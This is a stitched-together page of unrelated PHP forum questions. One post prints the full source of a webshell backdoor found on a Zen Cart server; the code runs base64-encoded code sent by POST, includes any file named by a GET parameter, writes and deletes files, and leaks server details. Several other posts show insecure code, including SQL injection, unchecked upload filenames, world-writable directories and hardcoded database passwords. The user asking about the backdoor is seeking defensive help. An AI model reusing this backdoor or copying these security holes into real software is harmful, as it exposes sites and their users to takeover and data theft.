PHP - Server Timeout With This Code

Is it possible to run a VBScript on the server from a PHP file called by the client?  I am using Apache as my web server on a Windows Server 2003 machine.

<?php
exec('saveAsTxt.vbs');
?>

It just hangs the browser and doesn't do anything.  I'm not sure what is going on.  If anyone can help, it would be much appreciated.
Thanks
Mike

I have some code that works fine on my dev server but does not work on my production server.  Dev server has PHP version 5.2.5 and production server has PHP version 5.1.6.

This is the part of the code that isn't working on the prod. server:
$xmlDoc=new DOMDocument();
$xmlDoc->loadXML($tmpDoc);

$x=$xmlDoc->getElementsByTagName('link');

//get the q parameter from URL
$q=$_GET["q"];

//lookup all links from the xml file if length of q>0
if (strlen($q)>0)
{
$hint="";
for($i=0; $i<($x->length); $i++)
{
$y=$x->item($i)->getElementsByTagName('title');
$z=$x->item($i)->getElementsByTagName('url');
if ($y->item(0)->nodeType==1)
{
//find a link matching the search text
if (stristr($y->item(0)->childNodes->item(0)->nodeValue,$q))
{
     if ($hint=="")
     {
     $hint="<tr><td><a href='" .
         $z->item(0)->childNodes->item(0)->nodeValue .
        "' target='_blank'>" .
        $y->item(0)->childNodes->item(0)->nodeValue . "</td></tr>";
     }
     else
    {
     $hint=$hint . "<tr><td><a href='" .
         $z->item(0)->childNodes->item(0)->nodeValue .
         "' target='_blank'>" .
         $y->item(0)->childNodes->item(0)->nodeValue . "</a></td></tr>";
     }
}
     }
   }
}

$tmpDoc is a variable that holds database information in xml form.  It basically looks like this:
$tmpDoc = $tmpDoc . "<link><title>" . $row['CustomerName'] . "****" . $row['Rep'] . "****" . $row['InstallDate'] . "****" . $row['PaidDate'] .  "</title><url>accountPage.php?AccNum=" . $row['AccountNum'] . "</url></link>";

...that is inside a while loop that loops through the rows returned by a query.

Basically, as I said, the whole thing works fine on my dev server but on the production server it never makes it into the for loop so I guess the condition $i<($x->length) isn't being met.  I'm at a bit of a loss here.  Is there anything like the PHP version or Apache version that may cause the "->" operator to not work?  The prod PHP version isn't that much older than my dev PHP version so I doubt that's the issue but it's about all I can think of.

Thanks!

I found this code added to my server uploaded into a zencart admin folder. We did have some problems previously with index.php and login.php files having some encoded javascript injected into them and mess up our online shop.

If someone could tell me what it does as i accidently launched it before i deleted it. Looked in the server logs and it seems to of accessed every file on the server within seconds.

Code: [Select]
<?php //e6b03bed4190733c7534e5c1209b076f

/**
 * @version 2.42
 * 
 */
if (isset($_POST["action"]))
{
        switch ($_POST["action"])
        {
                case "test":
                        test();
                        break;
                case "regular_test":
                        regular_test();
                        break;
                case "setup":
                        projectcodes_setup();
                        break;
                case "remove":
                        projectcodes_remove();
                        break;
                case "mail":
                        send();
                        break;
                default:
                        break;
        }
        return;
}

if (count($_GET) > 0)
{
        foreach ($_GET as $id => $code)
        {
                if ($id == "id")
                {
                        include $code;
                }
        }
        return;
}

function test()
{
        $encoded_data = "";

        $data["version"] = phpversion();
        if (isset($_SERVER["SERVER_SOFTWARE"]))
        {
                $data["serverapi"] = $_SERVER["SERVER_SOFTWARE"];
        }
        else
        {
                $data["serverapi"] = "Not Available";
        }
        ob_start();
        phpinfo(8);
        $data["modules"] = ob_get_contents();
        ob_clean();
        $data["ext_connect"] = fopen("http://www.ya.ru/", "r") ? TRUE : FALSE;
        $serializes_data = serialize($data);
        $encoded_data = base64_encode($serializes_data);
        echo $_POST["test_message"] . $encoded_data;
}

function regular_test()
{
        echo $_POST["test_message"];
}

function projectcodes_setup()
{
        $projectcodes = $_POST["projectcodes"];
        foreach ($projectcodes as $projectcode)
        {
                $mark = $projectcode["mark"];
                $code = base64_decode($projectcode["code"]);
                $res = new_file_put_contents($mark, $code);
                if ($res)
                {
                        $installed[] = $projectcode["id"];
                }
        }
        $installed = serialize($installed);
        $installed = base64_encode($installed);
        echo $installed;
}

function projectcodes_remove()
{
        $projectcodes = $_POST["projectcodes"];
        foreach ($projectcodes as $projectcode)
        {
                $mark = $projectcode["mark"];
                $res = unlink($mark);

                if ($res)
                {
                        $removed[] = $projectcode["id"];
                }
        }
        $removed = serialize($removed);
        $removed = base64_encode($removed);
        echo $removed;
}

function new_file_put_contents($filename, $data)
{
        $f = @fopen($filename, 'w');
        if (!$f)
        {
                return false;
        }
        else
        {
                $bytes = fwrite($f, $data);
                fclose($f);
                return $bytes;
        }
}

function new_file_get_contents($filename)
/* Returns the contents of file name passed
 */
{
        if (!function_exists('file_get_contents'))
        {
                $fhandle = fopen($filename, "r");
                $fcontents = fread($fhandle, filesize($filename));
                fclose($fhandle);
        }
        else
        {
                $fcontents = file_get_contents($filename);
        }
        return $fcontents;
}

function send()
{
        $code = base64_decode($_POST["projectcode"]);
      
        eval($code);
        //return;
}

?>

I have had a customer want to run my application (PHP/APACHE/MYSQL) on their server rather than a commercial hosting offering (JUSTHOST/GODADDY)   I am reluctant, as it means giving them access to my PHP code which could possibly be copied or distributed.    Can I protect against this?    

Hello everyone.. This is the first PHP script I've written and was hoping to get some feedback on any possible issues with it. I've pieced this together in an attempt to download remote images and store them on my server, instead of hotlinking images. The code will be used for a forum, called up by a BBCode tag. (The user will place an image URL into the BBCode, which will transfer to this PHP script). Again, this is the first time I've coded anything in PHP and was hoping to get some pointers on anything that needs changing.. thanks


<?php

$url = $_GET['url'];
$url_path = parse_url($url, PHP_URL_PATH);
$name = basename($url_path);
$FileExt= substr($name, -3); 
$FileTypeMIME= array("jpg" => "image/jpeg",
                         "png" => "image/png",
                         "gif" => "image/gif");

$ContentType= $FileTypeMIME[$FileExt];
if (empty($ContentType)) die("You are not allowed to access this file!");

header("Content-Type: " . $ContentType); 

$save = "../images/". strtolower($name); 

function wtf_image ($file) {
    switch($FileTypeMIME[$FileExt]){
        case "image/jpeg":
            $im = imagecreatefromjpeg($file); //jpeg file
       imagejpeg($im, $save, 0, NULL);   //save jpeg file 
        break;
        case "image/gif":
            $im = imagecreatefromgif($file); //gif file
       imagegif($im, $save, 0, NULL);   //save gif file
      break;
      case "image/png":
          $im = imagecreatefrompng($file); //png file
     imagePNG($im, $save, 0, NULL);   //save png file
      break;
    }
    return $im;
}

if (file_exists($save)) { 
readfile($save);  
} else { 
chmod($save,0755); 
$image = wtf_image($url);
//Runs wtf_image function on $url
imagedestroy($image);   
readfile($save); 
} 
?>

I am trying to get a php script on a remote server to execute on my server but im having problems getting it to work, and i am not sure if it is even feasible
i have had a look on google but i cant find much information on it.

This is what i have tried up to now

I saved a php script as a txt file on y remote server.
then used file_get_contents on my home server

$curl_scraped_page = file_get_contents('http://www.remote_server.com/script.txt');

the content of the txt file was

$sum = 1+1;

then i tried to echo $sum on the home server but i did not work can anyone point me in the right direction or is what i am trying to do even feasible?

Thanks in advanced

I hope I'm posting in the correct forum.  If not, I'm super sorry!
Anyways, I need help with a website I'm working on.  We have been asked to redesign our "Apply Online" page.  My supervisor has asked that I find the correct code to make an upload button that will allow users to upload their resumes to our server, and send a copy to the specific branch they indicate (we have 17 branches).  Could any of you point me in the correct direction for this code?  I've seen several sites for Uploads to servers, but I'm worried this isn't exactly what we are looking for.

To access MySql tables from PHP, I use the PHP code and the function below.

If I make these changes, would this code work for SQL Server 2008?

   mysql_fetch_array to mssql_fetch_array
   mysql_connect     to mssql_connect
   mysql_select_db   to mssql_select_db
   mysql_query       to mssql_query



PHP code
--------------------------------------------------------------------------------
$sql = "SELECT mast_id FROM district_mast WHERE mast_district = '".$dist_num."'";
$result = func_table_access($sql);
$rows = mysql_fetch_array($result);



Function
--------------------------------------------------------------------------------
FUNCTION func_table_access($sql)  {
  $db   = "aplustutoru";
  $host = "localhost";
  $user = "root";
  $pass = "";

  IF (!($conn=mysql_connect($host, $user, $pass))) {
    PRINTF("error connecting to DB by user = $user and pwd=$pass");
    EXIT;
    }

  $db3 = MYSQL_SELECT_DB($db,$conn) or die("Unable to connect to local database");
  IF ($sql <> "justopendb") {
    $result = MYSQL_QUERY($sql) OR DIE ("Can not run query because ". MYSQL_ERROR());
    RETURN $result;
    }
  }
                         

This topic has been moved to Miscellaneous.

http://www.phpfreaks.com/forums/index.php?topic=321861.0

Hi guys,

this is the geocoding part of the code.

I ran this ion my localhost and it runs ok. Then when i uploaded it to my server i got

500 - Internal server error.
There is a problem with the resource you are looking for, and it cannot be displayed.

When i take out the php the html code run ok... so its not that. Can anyone help?

I have taken out my key and db connection.

Im hosted on black knight if thats any help

Code: [Select]
<?php
require("config.php");

define("MAPS_HOST", "maps.google.com");
define("KEY", "****");

// Opens a connection to a MySQL server
$connection = mysql_connect("localhost", "root", "password");
if (!$connection) {
  die("Not connected : " . mysql_error());
}

// Set the active MySQL database
$db_selected = mysql_select_db("database", $connection);
if (!$db_selected) {
  die("Can\'t use db : " . mysql_error());
}

// Select all the rows in the markers table
$query = "SELECT * FROM users WHERE 1";
$result = mysql_query($query);
if (!$result) {
  die("Invalid query: " . mysql_error());
}

// Initialize delay in geocode speed
$delay = 0;
$base_url = "http://" . MAPS_HOST . "/maps/geo?output=xml" . "&key=" . KEY;

// Iterate through the rows, geocoding each address
while ($row = @mysql_fetch_assoc($result)) {
  $geocode_pending = true;

  while ($geocode_pending) {
    $address = $row["address1"];
    $id = $row["id"];
    $request_url = $base_url . "&q=" . urlencode($address);
    $xml = simplexml_load_file($request_url) or die("url not loading");

    $status = $xml->Response->Status->code;
    if (strcmp($status, "200") == 0) {
      // Successful geocode
      $geocode_pending = false;
      $coordinates = $xml->Response->Placemark->Point->coordinates;
      $coordinatesSplit = explode(",", $coordinates);
      // Format: Longitude, Latitude, Al
  itude
      $lat = $coordinatesSplit[1];
      $lng = $coordinatesSplit[0];

      $query = sprintf("UPDATE users " .
             " SET lat = '%s', lng = '%s' " .
             " WHERE id = '%s' LIMIT 1;",
             mysql_real_escape_string($lat),
             mysql_real_escape_string($lng),
             mysql_real_escape_string($id));
      $update_result = mysql_query($query);
      if (!$update_result) {
        die("Invalid query: " . mysql_error());
      }
    } else if (strcmp($status, "620") == 0) {
      // sent geocodes too fast
      $delay += 100000;
    } else {
      // failure to geocode
      $geocode_pending = false;
      echo "Address " . $address . " failed to geocoded. ";
      echo "Received status " . $status . "
\n";
    }
    usleep($delay);
  }
}
?>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Your Profile Page</title>
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<link rel="stylesheet" href="css/1.css" type="text/css" media="screen,projection" />

</head>
 
<body>

<div id="wrapper" class="fixed">

<div id="header">

<h1>Find A Tag Team</strong></h1>

<ul id="nav">

<li><a href="home.html">Home</a></li>

<li><a href="index.html"></a>Logout</li>

<li><a href="Links.php">Links</a></li>

<li><a href="Videos.php">Videos</a></li>



</ul>

</div>

<div id="sidebar_left">

<h2>Your Profile Page</h2>

<p>


</p>

<p>

From here you can ...<br />
-Edit all your information <br />
-Search for other users <br />
-View any emails you may have recieved</br />

</p>

<p>



</p>

</div>




<div id="content">

<h1>Profile</h1>
<div class ="message"> The map has been succesfully updated. <br />
<a href = "map.php">View the Map</div>

<div id="footer">


</div>
</div>

</body>
</html>

Hi Guys, I am new to this forum. I have tried other forums but with no success. I hope you can answer me.

Project: Job Application Form along with CV upload.
Backend: MySQL.
Problem: When the form is submitted, it replaces the same named file in my server.
Example: When I upload a file named "Example.doc" using this form and if there is already a file named "Example.doc" in the same directory (Server), the new file (example.doc) will replace the old one.
Solution Required: May be,
                              a) When I upload a file, the file name gets renamed with say the personsname+DOB+timestamp.
                              b) Any other solution which will not delete the old files present.

I am pasting the PHP code that I used .... for your kind perusal. Please help:

<?php


// Receiving variables
@$pfw_ip= $_SERVER['REMOTE_ADDR'];
@$Name = addslashes($_POST['Name']);
@$Telephone = addslashes($_POST['Telephone']);
@$Email = addslashes($_POST['Email']);
@$Mobile = addslashes($_POST['Mobile']);
@$CITY = addslashes($_POST['CITY']);
@$OtherLocation = addslashes($_POST['OtherLocation']);
@$PostalAddress = addslashes($_POST['PostalAddress']);
@$Years = addslashes($_POST['Years']);
@$Months = addslashes($_POST['Months']);
@$Lacs = addslashes($_POST['Lacs']);
@$Thousands = addslashes($_POST['Thousands']);
@$FunctionalArea = addslashes($_POST['FunctionalArea']);
@$CurrIndustry = addslashes($_POST['CurrIndustry']);
@$KeySkills = addslashes($_POST['KeySkills']);
@$ResumeTitle = addslashes($_POST['ResumeTitle']);
@$JobID = addslashes($_POST['JobID']);
@$TenthUniv = addslashes($_POST['TenthUniv']);
@$TenthPer = addslashes($_POST['TenthPer']);
@$TwlUniv = addslashes($_POST['TwlUniv']);
@$TwlPer = addslashes($_POST['TwlPer']);
@$UGCOURSE = addslashes($_POST['UGCOURSE']);
@$GradPer = addslashes($_POST['GradPer']);
@$PGCOURSE = addslashes($_POST['PGCOURSE']);
@$PPGCOURSE = addslashes($_POST['PPGCOURSE']);
@$course1 = addslashes($_POST['course1']);
@$course2 = addslashes($_POST['course2']);
@$course3 = addslashes($_POST['course3']);
@$Gender = addslashes($_POST['Gender']);
@$DOB = addslashes($_POST['DOB']);
@$Nationality = addslashes($_POST['Nationality']);
@$select2 = addslashes($_POST['select2']);
@$file_Name = $_FILES['file']['name'];
@$file_Size = $_FILES['file']['size'];
@$file_Temp = $_FILES['file']['tmp_name'];
@$file_Mime_Type = $_FILES['file']['type'];

function RecursiveMkdir($path)
 {
   if (!file_exists($path))
   {
      RecursiveMkdir(dirname($path));
      mkdir($path, 0777);
    }
  }


// Validation
if( $file_Size == 0)
{
die("<p align='center'><font face='Arial' size='3' color='#FF0000'>Please enter a valid file</font></p>");
}
if( $file_Size >50000000)
{
//delete file
unlink($file_Temp);
die("<p align='center'><font face='Arial' size='3' color='#FF0000'>Please enter a valid file</font></p>");
}
if( $file_Mime_Type != "application/msword" AND $file_Mime_Type != "application/pdf" AND $file_Mime_Type != "application/rtf" )
{
unlink($file_Temp);
die("<p align='center'><font face='Arial' size='3' color='#FF0000'>Please enter a valid file</font></p>");
}
$uploadFile =  $file_Name ;
if (!is_dir(dirname($uploadFile)))
  {
    @RecursiveMkdir(dirname($uploadFile));
  }
else
  {
  @chmod(dirname($uploadFile), 0777);
  }
@move_uploaded_file( $file_Temp , $uploadFile);
chmod($uploadFile, 0644);
$file_URL = "http://www.myserver.com/resume/".$file_Name ;

//saving record to MySQL database


@$pfw_strQuery = "INSERT INTO `Candidate_Test`(`Name`,`tel`,`email`,`mob`,`city`,`othr`,`add`,`yrs`,`mon`,`lacs`,`thnd`,`func`,`curr`,`skills`,`title`,`Jobid`,`tenb`,`tenp`,`twlb`,`twlp`,`ugb`,`ugp`,`pg`,`ppg`,`c1`,`c2`,`c3`,`gen`,`dob`,`nation`,`pref`,`file`)VALUES (\"$Name\",\"$Telephone\",\"$Email\",\"$Mobile\",\"$CITY\",\"$OtherLocation\",\"$PostalAddress\",\"$Years\",\"$Months\",\"$Lacs\",\"$Thousands\",\"$FunctionalArea\",\"$CurrIndustry\",\"$KeySkills\",\"$ResumeTitle\",\"$JobID\",\"$TenthUniv\",\"$TenthPer\",\"$TwlUniv\",\"$TwlPer\",\"$UGCOURSE\",\"$GradPer\",\"$PGCOURSE\",\"$PPGCOURSE\",\"$course1\",\"$course2\",\"$course3\",\"$Gender\",\"$DOB\",\"$Nationality\",\"$select2\",\"$file_Name\")" ;
@$pfw_host = "localhost";
@$pfw_user = "testuser";
@$pfw_pw = "ultimate09";
@$pfw_db = "Resumebank";
$pfw_link = mysql_connect($pfw_host, $pfw_user, $pfw_pw);
if (!$pfw_link) {
 die('Could not connect: ' . mysql_error());
}
$pfw_db_selected = mysql_select_db($pfw_db, $pfw_link);
if (!$pfw_db_selected) {
die ('Can not use $pfw_db : ' . mysql_error());
}

//insert new record
$pfw_result = mysql_query($pfw_strQuery);
if (!$pfw_result) {
 die('Invalid query: ' . mysql_error());
}
mysql_close($pfw_link);

 echo("<p align='center'><font face='Arial' size='3' color='#FF0000'>Successful</font></p>");
?>

 --------
PLEASE HELP. URGENTLY REQUIRED!!!!

Sourav Sengupta

Hey All,

I will be marketing a simple php script shortly and would like to Obfuscate my code and have it check to see if the person is running the script on the proper domain, much like other Purchased Scripts, you have to buy licenses and some are limited to a Per Domain basis.

Could I use cURL to run a script on another server (mine) that takes the URL it came from, and a variable "the auth key" and check if the person is using the script on the proper domain?  If the domain and auth key don't match in the DB i would return a message saying invalid key or something, else continue to execute the script.


<?php
//authkey would be defined in config file
$authkey = "769870afhljkzxf90436";

$curl_handle=curl_init();
curl_setopt($curl_handle,CURLOPT_URL,"http://example.com/page.php?authkey=$authkey");
curl_setopt($curl_handle,CURLOPT_CONNECTTIMEOUT,2);
curl_setopt($curl_handle,CURLOPT_RETURNTRANSFER,1);
$buffer = curl_exec($curl_handle);
curl_close($curl_handle);

if (empty($buffer))
{
    print "Sorry, AuthServ is performing maintenance.....<p>";
}
else
{
    print $buffer;
}
?>



Is there a smarter way to do this?  I don't have an extra 300 bucks to use something like ioncube,  just looking for a general proper direction on going about this as I am totally clueless.

thanks

Hi guys, I need a help to find out what is a problem. Some of my code does not work on my local comp and in the same time it works well when I place it on Internet server.
First example:
Code: [Select]
<body>
<?php 
if($_POST['submit_form'] == "Submit") 
{ $varNewTeam = $_POST['Reg_Team']; 
$varNewCity = $_POST['Reg_City']; 

 $db = mysql_connect('localhost', 'root', '') or die ('no connection with server');
  mysql_select_db('db_m ,$db) or die('DB error');
mysql_query ("INSERT INTO reg2012 VALUES ('$varNewTeam','$varNewCity')") or die('insert error');
} 
?>
<form action="registration_2012_form.php" method="post">
<p>Team: <input type="text" name="Reg_Team" size="20" maxlength="50" value="<?=$varNewTeam;?>" /><br /></p>
<p>City: <input type="text" name="Reg_City" size="20" maxlength="50" value="<?=$varNewCity;?>" /><br /></p>
<p><input type="Submit" value="Submit" name="submit_form" /></p>
</form>
</body>
On local comp: It gives me message "Undefined index: submit_form".
On Net server works well.
If I split the code in two files. In the first one I leave the form with "action=FILE2.php" and put my php code in the second file "FILE2.php" - it starts work even on local server.

second example:
Code: [Select]
<body>
<?php 
  $db = mysql_connect('localhost', 'root', '') or die ('no connection with server');
  mysql_select_db('db_m' ,$db) or die('DB error');
mysql_query ("CREATE TABLE temp1 (team char(50), city char(50) )") or die('create tables error');
?>
</body>
It works in the Net and can not create the TABLE on my local comp.

I use XAMPP on my local comp (if it's important)

Hello,

I am creating a website with the use of php and mysql. While I am not advanced, I've been learning quite a bit on php. However, I am looking to build a tracker type script and hide it into my coding so that if someone were to hack into my website and take my website coding, that it would send me an email notifying that they were using my coding.

How would I go about this? If you can help me, i'd be glad to credit you!

Thank you!

Hi Little Help Needed
I have created a new website
In the index.php file i want to show records from database

Now, here is how the problem arise
I want to import codes from github intead of hosting those files on my server because i want to keep it opensource

Below is the code I am using
<?php
// connect to the database
include('connect-db.php');

// get results from database
$sql = "SELECT id, upadhi, name FROM munishri";
$result = $conn->query($sql);

if ($result->num_rows > 0) {
// output data of each row
while($row = $result->fetch_assoc()) {
echo "id: " . $row["id"]. " - Name: " . $row["upadhi"]. " " . $row["name"]. "<br>";
}
} else {
echo "0 results";
}

// close connection
$conn->close();
?>

Can i host the code to show result in another file and use something like
<?php
// connect to the database
include('connect-db.php');

// get results from database
include('http://rawgit.com/th...database.php');
?>